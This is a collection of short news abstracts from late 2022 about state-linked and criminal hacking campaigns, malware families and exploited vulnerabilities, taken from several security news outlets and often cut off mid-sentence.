December 01, 2022
North Korea Hackers Using New “Dolphin” Backdoor to Spy on South Korean Targets Full Text
Abstract
The North Korea-linked ScarCruft group has been attributed to a previously undocumented backdoor called Dolphin that the threat actor has used against targets located in its southern counterpart. "The backdoor [...] has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers," ESET researcher Filip Jurčacko said in a new report published today. Dolphin is said to be selectively deployed, with the malware using cloud services like Google Drive for data exfiltration as well as command-and-control. The Slovak cybersecurity company said it found the implant deployed as a final-stage payload as part of a watering hole attack in early 2021 directed against a South Korean digital newspaper. The campaign, first uncovered by Kaspersky and Volexity last year, entailed the weaponization of two Internet Explorer flaws ( CVE-2020-1380The Hacker News
November 30, 2022
Crafty threat actor uses ‘aged’ domains to evade security platforms Full Text
Abstract
A sophisticated threat actor named 'CashRewindo' has been using aged domains in global malvertising campaigns that lead to investment scam sites.BleepingComputer
November 30, 2022
Chinese Cyber Espionage Hackers Using USB Devices to Target Entities in Philippines Full Text
Abstract
A threat actor with a suspected China nexus has been linked to a set of espionage attacks in the Philippines that primarily relies on USB devices as an initial infection vector. Mandiant, which is part of Google Cloud, is tracking the cluster under its uncategorized moniker UNC4191 . An analysis of the artifacts used in the intrusions indicates that the campaign dates as far back as September 2021. "UNC4191 operations have affected a range of public and private sector entities primarily in Southeast Asia and extending to the U.S., Europe, and APJ," researchers Ryan Tomcik, John Wolfram, Tommy Dacanay, and Geoff Ackerman said . "However, even when targeted organizations were based in other locations, the specific systems targeted by UNC4191 were also found to be physically located in the Philippines." The reliance on infected USB drives to propagate the malware is unusual if not new . The Raspberry Robin worm, which has evolved into an initial access serThe Hacker News
November 29, 2022
Threat actors are offering access to corporate networks via unauthorized Fortinet VPN access Full Text
Abstract
Cyble observed Initial Access Brokers (IABs) offering access to enterprise networks compromised via a critical flaw in Fortinet products. Researchers at Cyble have observed initial access brokers (IABs) selling access to enterprise networks likely...Security Affairs
November 29, 2022
Hackers Using Trending TikTok ‘Invisible Challenge’ to Spread Malware Full Text
Abstract
Threat actors are capitalizing on a popular TikTok challenge to trick users into downloading information-stealing malware, according to new research from Checkmarx. The trend, called Invisible Challenge , involves applying a filter known as Invisible Body that just leaves behind a silhouette of the person's body. But the fact that individuals filming such videos could be undressed has led to a nefarious scheme wherein the attackers post TikTok videos with links to rogue software dubbed "unfilter" that purport to remove the applied filters. "Instructions to get the 'unfilter' software deploy WASP stealer malware hiding inside malicious Python packages," Checkmarx researcher Guy Nachshon said in a Monday analysis. The WASP stealer (aka W4SP Stealer) is a malware that's designed to steal users' passwords, Discord accounts, cryptocurrency wallets, and other sensitive information. The TikTok videos posted by the attackers, @learncyber anThe Hacker News
November 28, 2022
Russian Hacker Groups Xenotime and Kamacite Target Dutch LNG Terminal Full Text
Abstract
Russian hackers have been doing “exploratory research” into the systems of the Dutch LNG terminals, trying to find ways into the systems, American cybersecurity company Dragos has reported.Yahoo Finance
November 27, 2022
Abandoned Boa Servers Abused by Chinese Attackers to Target Critical Industries Full Text
Abstract
Boa web server was discontinued in 2005, however, different vendors still implement it across a variety of IoT devices ranging from routers to cameras and popular SDKs.Cyware Alerts - Hacker News
November 25, 2022
Bahamut Cyber Mercenary Group Targets Android Users with Fake VPN Apps Full Text
Abstract
A hacking-for-hire group is distributing malicious apps through a fake SecureVPN website that enables Android apps to be downloaded from Google Play, say researchers at Eset.ESET Security
November 24, 2022
Ducktail Group Brings New Arsenal and Evasion Tactics to Uplift Its Attack Game Full Text
Abstract
WithSecure researchers have published an advisory about new developments of the Ducktail infostealer. The recent campaigns feature new tricks to spear-phish targets via WhatsApp.Cyware Alerts - Hacker News
November 24, 2022
Threat actors exploit discontinues Boa web servers to target critical infrastructure Full Text
Abstract
Microsoft reported that hackers have exploited flaws in a now-discontinued web server called Boa in attacks against critical industries. Microsoft experts believe that threat actors behind a malicious campaign aimed at Indian critical infrastructure...Security Affairs
November 24, 2022
Bahamut Cyber Espionage Hackers Targeting Android Users with Fake VPN Apps Full Text
Abstract
The cyber espionage group known as Bahamut has been attributed as behind a highly targeted campaign that infects users of Android devices with malicious apps designed to extract sensitive information. The activity, which has been active since January 2022, entails distributing rogue VPN apps through a fake SecureVPN website set up for this purpose, Slovak cybersecurity firm ESET said in a new report shared with The Hacker News. At least eight different variants of the spyware apps have been discovered to date, with them being trojanized versions of legitimate VPN apps like SoftVPN and OpenVPN . The tampered apps and their updates are pushed to users through the fraudulent website. It's also suspected that the targets are carefully selected, since launching the app requires the victim to enter an activation key to enable the features. This implies the use of an undetermined distribution vector, although past evidence shows that it could take the form of spear-phishing emThe Hacker News
November 23, 2022
Hackers Exploiting Abandoned Boa Web Servers to Target Critical Industries Full Text
Abstract
Microsoft on Tuesday disclosed the intrusion activity aimed at Indian power grid entities earlier this year likely involved the exploitation of security flaws in a now-discontinued web server called Boa . The tech behemoth's cybersecurity division said the vulnerable component poses a "supply chain risk that may affect millions of organizations and devices." The findings build on a prior report published by Recorded Future in April 2022, which delved into a sustained campaign orchestrated by suspected China-linked adversaries to strike critical infrastructure organizations in India. The cybersecurity firm attributed the attacks to a previously undocumented threat cluster called Threat Activity Group 38. While the Indian government described the attacks as unsuccessful "probing attempts," China denied it was behind the campaign. The connections to China stem from the use of a modular backdoor dubbed ShadowPad , which is known to be shared among severalThe Hacker News
November 22, 2022
Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor Notice Full Text
Abstract
Proofpoint researchers expect Nighthawk will show up in threat actor campaigns as the tool becomes more widely recognized or as threat actors search for new, more capable tools to use against targets.Proof Point
November 21, 2022
DEV-0569 Group Switches Tactics, Abuses Google Ads to Deliver Payloads Full Text
Abstract
DEV-0569 uses a malware downloader, BatLoader, that drops the next stage payloads (via PowerShell commands), including Royal ransomware and Cobalt Strike Beacon implant.Cyware Alerts - Hacker News
November 21, 2022
Attackers bypass Coinbase and MetaMask 2FA via TeamViewer, fake support chat Full Text
Abstract
A crypto-stealing phishing campaign is underway to bypass multi-factor authentication and gain access to accounts on Coinbase, MetaMask, Crypto.com, and KuCoin and steal cryptocurrency.BleepingComputer
November 19, 2022
DEV-0569 group uses Google Ads to distribute Royal Ransomware Full Text
Abstract
Microsoft warns that a threat actor, tracked as DEV-0569, is using Google Ads to distribute the recently discovered Royal ransomware. Researchers from the Microsoft Security Threat Intelligence team warned that a threat actor, tracked as DEV-0569,...Security Affairs
November 19, 2022
Microsoft Warns of Hackers Using Google Ads to Distribute Royal Ransomware Full Text
Abstract
A developing threat activity cluster has been found using Google Ads in one of its campaigns to distribute various post-compromise payloads, including the recently discovered Royal ransomware . Microsoft, which spotted the updated malware delivery method in late October 2022, is tracking the group under the name DEV-0569 . "Observed DEV-0569 attacks show a pattern of continuous innovation, with regular incorporation of new discovery techniques, defense evasion, and various post-compromise payloads, alongside increasing ransomware facilitation," the Microsoft Security Threat Intelligence team said in an analysis. The threat actor is known to rely on malvertising to point unsuspecting victims to malware downloader links that pose as software installers for legitimate apps like Adobe Flash Player, AnyDesk, LogMeIn, Microsoft Teams, and Zoom. The malware downloader, a strain referred to as BATLOADER , is a dropper that functions as a conduit to distribute next-stage paThe Hacker News
November 19, 2022
Chinese ‘Mustang Panda’ Hackers Actively Targeting Governments Worldwide Full Text
Abstract
A notorious advanced persistent threat actor known as Mustang Panda has been linked to a spate of spear-phishing attacks targeting government, education, and research sectors across the world. The primary targets of the intrusions from May to October 2022 included counties in the Asia Pacific region such as Myanmar, Australia, the Philippines, Japan, and Taiwan, cybersecurity firm Trend Micro said in a Friday report. Mustang Panda, also called Bronze President, Earth Preta, HoneyMyte, and Red Lich, is a China-based espionage actor believed to be active since at least July 2018. The group is known for its use of malware such as China Chopper and PlugX to collect data from compromised environments. Activities of the group chronicled by ESET , Google, Proofpoint , Cisco Talos , and Secureworks this year have revealed the threat actor's pattern of using PlugX (and its variant called Hodur) to infect a wide range of entities in Asia, Europe, the Middle East, and the AmeriThe Hacker News
November 18, 2022
Chinese hackers use Google Drive to drop malware on govt networks Full Text
Abstract
State-backed Chinese hackers launched a spearphishing campaign to deliver custom malware stored in Google Drive to government, research, and academic organizations worldwide.BleepingComputer
November 17, 2022
A Comprehensive Look at Emotet’s Fall 2022 Return Full Text
Abstract
TA542, an actor that distributes Emotet malware, has once again returned from an extensive break from delivering malicious emails. The actor was absent from the landscape for nearly four months but became active again in early November.Proof Point
November 17, 2022
North Korean Hackers Targeting Europe and Latin America with Updated DTrack Backdoor Full Text
Abstract
Hackers tied to the North Korean government have been observed using an updated version of a backdoor known as Dtrack targeting a wide range of industries in Germany, Brazil, India, Italy, Mexico, Switzerland, Saudi Arabia, Turkey, and the U.S. "Dtrack allows criminals to upload, download, start or delete files on the victim host," Kaspersky researchers Konstantin Zykov and Jornt van der Wiel said in a report. The victimology patterns indicate an expansion to Europe and Latin America. Sectors targeted by the malware are education, chemical manufacturing, governmental research centers and policy institutes, IT service providers, utility providers, and telecommunication firms. Dtrack, also called Valefor and Preft, is the handiwork of Andariel, a subgroup of the Lazarus nation-state threat actor that's publicly tracked by the broader cybersecurity community using the monikers Operation Troy, Silent Chollima, and Stonefly. Discovered in September 2019, the malwareThe Hacker News
November 15, 2022
North Korean hackers target European orgs with updated malware Full Text
Abstract
North Korean hackers are using a new version of the DTrack backdoor to attack organizations in Europe and Latin America.BleepingComputer
November 15, 2022
Chinese hackers target government agencies and defense orgs Full Text
Abstract
The Chinese espionage APT (advanced persistent threat), tracked as 'Billbug' (aka Thrip, or Lotus Blossom), is currently running a 2022 campaign targeting government agencies and defense organizations in multiple Asian countries.BleepingComputer
November 15, 2022
Chinese State-Sponsored Actor Targets Certificate Authority, Government Agencies Across Asia Full Text
Abstract
Billbug (aka Lotus Blossom, Thrip) is a long-established advanced persistent threat (APT) group that is believed to have been active since at least 2009. The attackers use multiple dual-use tools in this attack campaign, as well as custom malware.Symantec
November 14, 2022
Worok Hackers Abuse Dropbox API to Exfiltrate Data via Backdoor Hidden in Images Full Text
Abstract
A recently discovered cyber espionage group dubbed Worok has been found hiding malware in seemingly innocuous image files, corroborating a crucial link in the threat actor's infection chain. Czech cybersecurity firm Avast said the purpose of the PNG files is to conceal a payload that's used to facilitate information theft. "What is noteworthy is data collection from victims' machines using Dropbox repository, as well as attackers using Dropbox API for communication with the final stage," the company said . The development comes a little over two months after ESET disclosed details of attacks carried out by Worok against high-profile companies and local governments located in Asia and Africa. Worok is believed to share tactical overlaps with a Chinese threat actor tracked as TA428 . The Slovak cybersecurity company also documented Worok's compromise sequence, which makes use of a C++-based loader called CLRLoad to pave the way for an unknown PowerSThe Hacker News
November 13, 2022
Ukraine says Russian hacktivists use new Somnia ransomware Full Text
Abstract
Russian hacktivists have infected multiple organizations in Ukraine with a new ransomware strain called 'Somnia,' encrypting their systems and causing operational problems.BleepingComputer
November 12, 2022
Australia tells Medibank hackers: ‘We know who you are’ Full Text
Abstract
The Australian Federal Police claims to have identified the cybercriminals behind the Medibank ransomware attack, which compromised the personal data of 9.7 million customers.Tech Crunch
November 10, 2022
Conti Affiliates BlackByte and Black Basta Rotating Targets Full Text
Abstract
The threat ecosystem of Conti is growing stronger day by day. And, it can be evidenced by the recent findings about how it is drifting away from U.S. targets to target NATO-affiliated countries in Europe. Conti is forming new allies, developing new tools and techniques, and actively hacking critica ... Read MoreCyware Alerts - Hacker News
November 10, 2022
Russian military hackers linked to ransomware attacks in Ukraine Full Text
Abstract
A series of attacks targeting transportation and logistics organizations in Ukraine and Poland with Prestige ransomware since October have been linked to an elite Russian military cyberespionage group.BleepingComputer
November 10, 2022
Worok hackers hide new malware in PNGs using steganography Full Text
Abstract
A threat group tracked as 'Worok' hides malware within PNG images to infect victims' machines with information-stealing malware without raising alarms.BleepingComputer
November 9, 2022
Surveillance vendor exploited Samsung phone zero-days Full Text
Abstract
Google Project Zero researchers reported that a surveillance vendor is using three Samsung phone zero-day exploits. Google Project Zero disclosed three Samsung phone vulnerabilities, tracked as CVE-2021-25337, CVE-2021-25369 and CVE-2021-25370, that...Security Affairs
November 09, 2022
New hacking group uses custom ‘Symatic’ Cobalt Strike loaders Full Text
Abstract
A previously unknown Chinese APT (advanced persistent threat) hacking group dubbed 'Earth Longzhi' targets organizations in East Asia, Southeast Asia, and Ukraine.BleepingComputer
November 9, 2022
Justice Blade Group Targets Saudi Arabian Giants Full Text
Abstract
Justice Blade threat actor released data from outsourcing IT vendor Smart Link BPO Solutions. The vendor works with relatively bigger organizations and government agencies in the Kingdom of Saudi Arabia and other countries in the GCC. It is said that cybercriminals may have stolen CRM records, pers ... Read MoreCyware Alerts - Hacker News
November 7, 2022
‘Justice Blade’ Hackers are Targeting Saudi Arabia Full Text
Abstract
Threats actors calling themselves "Justice Blade" published leaked data from an outsourcing IT vendor. The group of threat actors calling themselves 'Justice Blade' published leaked data from Smart Link BPO Solutions, an outsourcing IT vendor working...Security Affairs
November 7, 2022
Microsoft Accuses Chinese State-linked Actors of Abusing Vulnerability Disclosure Requirements Full Text
Abstract
Microsoft on Friday accused state-backed hackers in China of abusing the country’s vulnerability disclosure requirements in an effort to discover and develop zero-day exploits.The Record
November 03, 2022
Researchers Find Links b/w Black Basta Ransomware and FIN7 Hackers Full Text
Abstract
A new analysis of tools put to use by the Black Basta ransomware operation has identified ties between the threat actor and the FIN7 (aka Carbanak) group. This link "could suggest either that Black Basta and FIN7 maintain a special relationship or that one or more individuals belong to both groups," cybersecurity firm SentinelOne said in a technical write-up shared with The Hacker News. Black Basta, which emerged earlier this year, has been attributed to a ransomware spree that has claimed over 90 organizations as of September 2022, suggesting that the adversary is both well-organized and well-resourced. One notable aspect that makes the group stand out, per SentinelOne, is the fact that there have been no signs of its operators attempting to recruit affiliates or advertising the malware as a RaaS on darknet forums or crimeware marketplaces. This has raised the possibility that the Black Basta developers either cut out affiliates from the chain and deploy the ransoThe Hacker News
November 03, 2022
Hackers Using Rogue Versions of KeePass and SolarWinds Software to Distribute RomCom RAT Full Text
Abstract
The operators of RomCom RAT are continuing to evolve their campaigns with rogue versions of software such as SolarWinds Network Performance Monitor, KeePass password manager, and PDF Reader Pro. Targets of the operation consist of victims in Ukraine and select English-speaking countries like the U.K. "Given the geography of the targets and the current geopolitical situation, it's unlikely that the RomCom RAT threat actor is cybercrime-motivated," the BlackBerry Threat Research and Intelligence Team said in a new analysis. The latest findings come a week after the Canadian cybersecurity company disclosed a spear-phishing campaign aimed at Ukrainian entities to deploy a remote access trojan called RomCom RAT. The unknown threat actor has also been observed leveraging trojanized variants of Advanced IP Scanner and pdfFiller as droppers to distribute the implant. The latest iteration of the campaign entails setting up decoy lookalike websites with a similar domainThe Hacker News
November 1, 2022
Cranefly Group Abuses Legitimate IIS Logs To Deliver New Malware Full Text
Abstract
The Cranefly hacker group was spotted leveraging Microsoft IIS to deploy a previously undocumented dropper, named Danfuan, on security tools such as load balancers and SANS arrays. With new custom tools and evasive techniques, Cranefly is maintaining a foothold on compromised servers and focusing o ... Read MoreCyware Alerts - Hacker News
November 01, 2022
Chinese Hackers Using New Stealthy Infection Chain to Deploy LODEINFO Malware Full Text
Abstract
The Chinese state-sponsored threat actor known as Stone Panda has been observed employing a new stealthy infection chain in its attacks aimed at Japanese entities. Targets include media, diplomatic, governmental and public sector organizations and think-tanks in Japan, according to twin reports published by Kaspersky. Stone Panda , also called APT10 , Bronze Riverside, Cicada, and Potassium, is a cyber espionage group known for its intrusions against organizations identified as strategically significant to China. The threat actor is believed to have been active since at least 2009. The latest set of attacks, observed between March and June 2022, involve the use of a bogus Microsoft Word file and a self-extracting archive ( SFX ) file in RAR format propagated via spear-phishing emails, leading to the execution of a backdoor called LODEINFO. While the maldoc requires users to enable macros to activate the killchain, the June 2022 campaign was found to drop this method in faThe Hacker News
October 31, 2022
Hacking group abuses antivirus software to launch LODEINFO malware Full Text
Abstract
The Chinese Cicada hacking group, tracked as APT10, was observed abusing security software to install a new version of the LODEINFO malware against Japanese organizations.BleepingComputer
October 28, 2022
Researchers Uncover Stealthy Techniques Used by Cranefly Espionage Hackers Full Text
Abstract
A recently discovered hacking group known for targeting employees dealing with corporate transactions has been linked to a new backdoor called Danfuan . This hitherto undocumented malware is delivered via another dropper called Geppei, researchers from Symantec, by Broadcom Software, said in a report shared with The Hacker News. The dropper "is being used to install a new backdoor and other tools using the novel technique of reading commands from seemingly innocuous Internet Information Services ( IIS ) logs," the researchers said. The toolset has been attributed by the cybersecurity company to a suspected espionage actor called UNC3524, aka Cranefly, which first came to light in May 2022 for its focus on bulk email collection from victims who deal with mergers and acquisitions and other financial transactions. One of the group's key malware strains is QUIETEXIT, a backdoor deployed on network appliances that do not support antivirus or endpoint detection, suchThe Hacker News
October 28, 2022
Hackers use Microsoft IIS web server logs to control malware Full Text
Abstract
The Cranefly hacking group, aka UNC3524, uses a previously unseen technique of controlling malware on infected devices via Microsoft Internet Information Services (IIS) web server logs.BleepingComputer
October 26, 2022
Notorious ‘BestBuy’ hacker arraigned for running dark web market Full Text
Abstract
A notorious British hacker was arraigned on Wednesday by the U.S. Department of Justice for allegedly running the now defunct 'The Real Deal" dark web marketplace.BleepingComputer
October 26, 2022
Kimsuky Hackers Spotted Using 3 New Android Malware to Target South Koreans Full Text
Abstract
The North Korean espionage-focused actor known as Kimsuky has been observed using three different Android malware strains to target users located in its southern counterpart. That's according to findings from South Korean cybersecurity company S2W, which named the malware families FastFire, FastViewer, and FastSpy. "The FastFire malware is disguised as a Google security plugin, and the FastViewer malware disguises itself as 'Hancom Office Viewer,' [while] FastSpy is a remote access tool based on AndroSpy ," researchers Lee Sebin and Shin Yeongjae said . Kimsuky, also known by the names Black Banshee, Thallium, and Velvet Chollima, is believed to be tasked by the North Korean regime with a global intelligence-gathering mission, disproportionately targeting individuals and organizations in South Korea, Japan, and the U.S. This past August, Kaspersky unearthed a previously undocumented infection chain dubbed GoldDragon to deploy a Windows backdoor capable oThe Hacker News
October 26, 2022
Unknown Actors are Deploying RomCom RAT to Target Ukrainian Military Full Text
Abstract
The threat actor behind a remote access trojan called RomCom RAT has been observed targeting Ukrainian military institutions as part of a new spear-phishing campaign that commenced on October 21, 2022. The development marks a shift in the attacker's modus operandi, which has been previously attributed to spoofing legitimate apps like Advanced IP Scanner and pdfFiller to drop backdoors on compromised systems. "The initial 'Advanced IP Scanner' campaign occurred on July 23, 2022," the BlackBerry research and intelligence team said . "Once the victim installs a Trojanized bundle, it drops RomCom RAT to the system." While previous iterations of the campaign involved the use of trojanized Advanced IP Scanner, the unidentified adversarial collective has since switched to pdfFiller as of October 20, indicating an active attempt on part of the adversary to refine tactics and thwart detection. These lookalike websites host a rogue installer package that rThe Hacker News
October 26, 2022
Vice Society Hackers Are Behind Several Ransomware Attacks Against Education Sector Full Text
Abstract
A cybercrime group known as Vice Society has been linked to multiple ransomware strains in its malicious campaigns aimed at the education, government, and retail sectors. The Microsoft Security Threat Intelligence team, which is tracking the threat cluster under the moniker DEV-0832, said the group avoids deploying ransomware in some cases and rather likely carries out extortion using exfiltrated stolen data. "Shifting ransomware payloads over time from BlackCat , Quantum Locker , and Zeppelin , DEV-0832's latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as .v-s0ciety, .v-society, and, most recently, .locked," the tech giant's cybersecurity division said . Vice Society, active since June 2021, has been steadily observed encrypting and exfiltrating victim data, and threatening companies with exposure of siphoned information to pressure them into paying a ransom. "Unlike other RaaS (Ransomware-as-a-Service)The Hacker News
October 21, 2022
What Impact, if Any, Does Killnet Have? Full Text
Abstract
Killnet, the pro-Russian hacktivist collective, launched an ineffective DDoS attack on U.S. government websites earlier this month, leaving many to wonder what the purpose of such groups is and what impact they actually have, especially amid the war in Ukraine.Lawfare
October 20, 2022
Hacking group updates Furball Android spyware to evade detection Full Text
Abstract
A new version of the 'FurBall' Android spyware has been found targeting Iranian citizens in mobile surveillance campaigns conducted by the Domestic Kitten hacking group, also known as APT-C-50.BleepingComputer
October 19, 2022
Winnti Threat Group Targets Government Organizations In Hong Kong and Srilanka Full Text
Abstract
In its latest activities, Winnti focused on Hong Kong and Srilankan organizations. It deployed Spyder Loader (Trojan.Spyload) malware on victim networks in Hong Kong, mostly as a part of the CuckooBees campaign.Heimdal Security
October 19, 2022
Is it TeamTNT Or a Copycat Group? Full Text
Abstract
Recent observations by researchers say a threat group, maybe TeamTNT, has returned. The copycat group is imitating the routines of TeamTNT and has been deploying an XMRig cryptocurrency miner.Trend Micro
October 18, 2022
Hackers target Asian casinos in lengthy cyberespionage campaign Full Text
Abstract
A hacking group named 'DiceyF' has been observed deploying a malicious attack framework against online casinos based in Southeast Asia since at least November 2021.BleepingComputer
October 17, 2022
Black Basta Ransomware Hackers Infiltrates Networks via Qakbot to Deploy Brute Ratel C4 Full Text
Abstract
The threat actors behind the Black Basta ransomware family have been observed using the Qakbot trojan to deploy the Brute Ratel C4 framework as a second-stage payload in recent attacks. The development marks the first time the nascent adversary simulation software is being delivered via a Qakbot infection, cybersecurity firm Trend Micro said in a technical analysis released last week. The intrusion, achieved using a phishing email containing a weaponized link pointing to a ZIP archive, further entailed the use of Cobalt Strike for lateral movement. While these legitimate utilities are designed for conducting penetration testing activities, their ability to offer remote access has made them a lucrative tool in the hands of attackers looking to stealthily probe the compromised environment without attracting attention for extended periods of time. This has been compounded by the fact that a cracked version of Brute Ratel C4 began circulating last month across the cybercrimiThe Hacker News
October 14, 2022
New Chinese Cyberespionage Group Targeting IT Service Providers and Telcos Full Text
Abstract
Telecommunications and IT service providers in the Middle East and Asia are being targeted by a previously undocumented Chinese-speaking threat group dubbed WIP19 . The espionage-related attacks are characterized by the use of a stolen digital certificate issued by a Korean company called DEEPSoft to sign malicious artifacts deployed during the infection chain to evade detection. "Almost all operations performed by the threat actor were completed in a 'hands-on keyboard' fashion, during an interactive session with compromised machines," SentinelOne researchers Joey Chen and Amitai Ben Shushan Ehrlich said in a report this week. "This meant the attacker gave up on a stable [command-and-control] channel in exchange for stealth." WIP, short for work-in-progress, is the moniker assigned by SentinelOne to emerging or hitherto unattributed activity clusters, similar to the UNC####, DEV-####, and TAG-## designations given by Mandiant, Microsoft, and RecoThe Hacker News
October 14, 2022
Operators Behind IcedID Trojan Diversify their Delivery Tactics Full Text
Abstract
Threat actors behind the IcedID malware have been found using a variety of propagation methods, including changing the management of C2 server IPs, in their phishing campaigns. The attackers were found registering fresh domains for C2, instead of relying on the old ones.Cyware Alerts - Hacker News
October 13, 2022
Budworm Espionage Group Returns to Targeting U.S. Organizations Full Text
Abstract
Budworm’s main payload continues to be the HyperBro malware family, which is often loaded using a technique known as DLL side-loading. This involves the attackers placing a malicious DLL in a directory where a legitimate DLL is expected to be found.Symantec
October 13, 2022
New Alchimist Attack Framework Written in Chinese for Mac, Linux, and Windows Full Text
Abstract
Cisco Talos discovered a new attack framework including a command and control (C2) tool called "Alchimist" and a new malware "Insekt" with remote administration capabilities.Cisco Talos
October 13, 2022
Budworm Hackers Resurface with New Espionage Attacks Aimed at U.S. Organization Full Text
Abstract
An advanced persistent threat (APT) actor known as Budworm targeted a U.S.-based entity for the first time in more than six years, according to latest research. The attack was aimed at an unnamed U.S. state legislature, the Symantec Threat Hunter team, part of Broadcom Software, said in a report shared with The Hacker News. Other "strategically significant" intrusions mounted over the past six months were directed against a government of a Middle Eastern country, a multinational electronics manufacturer, and a hospital in South East Asia. Budworm , also called APT27, Bronze Union, Emissary Panda, Lucky Mouse, and Red Phoenix, is a threat actor that's believed to operate on behalf of China through attacks that leverage a mix of custom and openly available tools to exfiltrate information of interest. "Bronze Union maintains a high degree of operational flexibility in order to adapt to the environments it operates in," Secureworks notes in a profile ofThe Hacker News
October 11, 2022
Experts analyzed the evolution of the Emotet supply chain Full Text
Abstract
Threat actors behind the Emotet bot are continually improving their tactics, techniques, and procedures to avoid detection. VMware researchers have analyzed the supply chain behind the Emotet malware reporting that its operators are continually shifting...Security Affairs
October 11, 2022
POLONIUM Threat Group Targets Israeli Organizations with ‘Creepy’ Malware Full Text
Abstract
ESET researchers revealed their findings about POLONIUM, an advanced persistent threat (APT) group about which little information is publicly available and its initial compromise vector is unknown.ESET Security
October 10, 2022
Hackers behind IcedID malware attacks diversify delivery tactics Full Text
Abstract
The threat actors behind IcedID malware phishing campaigns are utilizing a wide variety of distribution methods, likely to determine what works best against different targets.BleepingComputer
October 10, 2022
Pro-Russia group KillNet targets US airports Full Text
Abstract
The pro-Russia hacktivist group 'KillNet' is behind massive DDoS attacks that hit websites of several major airports in the US. The pro-Russia hacktivist group 'KillNet' is claiming responsibility for massive distributed denial-of-service (DDoS) attacks...Security Affairs
October 08, 2022
Hackers Exploiting Unpatched RCE Flaw in Zimbra Collaboration Suite Full Text
Abstract
A severe remote code execution vulnerability in Zimbra's enterprise collaboration software and email platform is being actively exploited, with no patch currently available to remediate the issue. The shortcoming, assigned CVE-2022-41352 , carries a critical-severity rating of CVSS 9.8, providing a pathway for attackers to upload arbitrary files and carry out malicious actions on affected installations. "The vulnerability is due to the method ( cpio ) in which Zimbra's antivirus engine ( Amavis ) scans inbound emails," cybersecurity firm Rapid7 said in an analysis published this week. The issue is said to have been abused since early September 2022, according to details shared on Zimbra forums. While a fix is yet to be released, the software services company is urging users to install the "pax" utility and restart the Zimbra services. "If the pax package is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is iThe Hacker News
October 07, 2022
Hackers exploiting unpatched RCE bug in Zimbra Collaboration Suite Full Text
Abstract
Hackers are actively exploiting an unpatched remote code execution (RCE) vulnerability in Zimbra Collaboration Suite (ZCS), a widely deployed web client and email server.BleepingComputer
October 07, 2022
LofyGang hackers built a credential-stealing enterprise on Discord, NPM Full Text
Abstract
A threat group using the name 'LofyGang', operating since 2020, is considered responsible for creating and distributing over 200 malicious packages on multiple code hosting platforms, including GitHub and NPM.BleepingComputer
October 04, 2022
Hackers stole data from US defense org using Impacket, CovalentStealer Full Text
Abstract
The U.S. Government today released an alert about state-backed hackers using a custom CovalentStealer malware and the Impacket framework to steal sensitive data from a U.S. organization in the Defense Industrial Base (DIB) sector.BleepingComputer
October 4, 2022
Witchetty Group Uses Steganography To Target Middle East Entities Full Text
Abstract
In an ongoing cyberespionage campaign, hacking group Witchetty has been found targeting two governments in the Middle East and a stock exchange in Africa. Among the new tools used by the group is a backdoor named Stegmap. The malware is distributed via the rarely used steganography technique.Cyware Alerts - Hacker News
October 3, 2022
Analysis of DeftTorero TTPs in 2019–2021 Full Text
Abstract
During the intrusion analysis of DeftTorero’s webshells, researchers noted traces suggesting that the threat actor exploited a file upload form and/or a command injection flaw in a functional or staging website hosted on the target web server.Securelist
October 01, 2022
State-Sponsored Hackers Likely Exploited MS Exchange 0-Days Against ~10 Organizations Full Text
Abstract
Microsoft on Friday disclosed that a single activity group in August 2022 achieved initial access and breached Exchange servers by chaining the two newly disclosed zero-day flaws in a limited set of attacks aimed at less than 10 organizations globally. "These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration," the Microsoft Threat Intelligence Center (MSTIC) said in a new analysis. The weaponization of the vulnerabilities is expected to ramp up in the coming days, Microsoft further warned, as malicious actors co-opt the exploits into their toolkits, including deploying ransomware, due to the "highly privileged access Exchange systems confer onto an attacker." The tech giant attributed the ongoing attacks with medium confidence to a state-sponsored organization, adding it was already investigating these attacks when the Zero Day Initiative dThe Hacker News
September 30, 2022
North Korean Hackers Weaponizing Open-Source Software in Latest Cyber Attacks Full Text
Abstract
A "highly operational, destructive, and sophisticated nation-state activity group" with ties to North Korea has been weaponizing open source software in their social engineering campaigns aimed at companies around the world since June 2022. Microsoft's threat intelligence teams, alongside LinkedIn Threat Prevention and Defense, attributed the intrusions with high confidence to Zinc , which is also tracked under the names Labyrinth Chollima. Attacks targeted employees in organizations across multiple industries, including media, defense and aerospace, and IT services in the U.S., the U.K., India, and Russia. The tech giant said it observed Zinc leveraging a "wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installer for these attacks." According to CrowdStrike , Zinc "has been active since 2009 in operations aimed at collecting political, military, and economic intelliThe Hacker News
September 30, 2022
North Korean State-backed Hackers Found Rigging Legit Open-Source Software with Malware Full Text
Abstract
The hackers, a sub-group of Lazarus called ZINC, are weaponizing a wide range of open-source software including PuTTY, KiTTY, TightVNC, Sumatra PDF Reader, and muPDF/Subliminal Recording software installers in a new wave of malware attacks.Security Week
September 29, 2022
Brazilian Prilex Hackers Resurfaced With Sophisticated Point-of-Sale Malware Full Text
Abstract
A Brazilian threat actor known as Prilex has resurfaced after a year-long operational hiatus with an advanced and complex malware to steal money by means of fraudulent transactions. "The Prilex group has shown a high level of knowledge about credit and debit card transactions, and how software used for payment processing works," Kaspersky researchers said . "This enables the attackers to keep updating their tools in order to find a way to circumvent the authorization policies, allowing them to perform their attacks." The cybercrime group emerged on the scene with ATM-focused malware attacks in the South American nation, providing it the ability to break into ATM machines to perform jackpotting – a type of attack aiming to dispense cash illegitimately – and clone thousands of credit cards to steal funds from the targeted bank's customers. Prilex's modus operandi over the years has since evolved to take advantage of processes relating to point-of-saleThe Hacker News
September 29, 2022
Hacker groups support protestors in Iran using Telegram, Signal and Darkweb Full Text
Abstract
Several hacker groups are assisting protestors in Iran using Telegram, Signal and other tools to bypass government censorship. Check Point Research (CPR) observed multiple hacker groups using Telegram, Signal and the darkweb to support protestors...Security Affairs
September 29, 2022
Hacking group hides backdoor malware inside Windows logo image Full Text
Abstract
Security researchers have discovered a malicious campaign by the 'Witchetty' hacking group, which uses steganography to hide a backdoor malware in a Windows logo.BleepingComputer
September 29, 2022
Microsoft: Lazarus hackers are weaponizing open-source software Full Text
Abstract
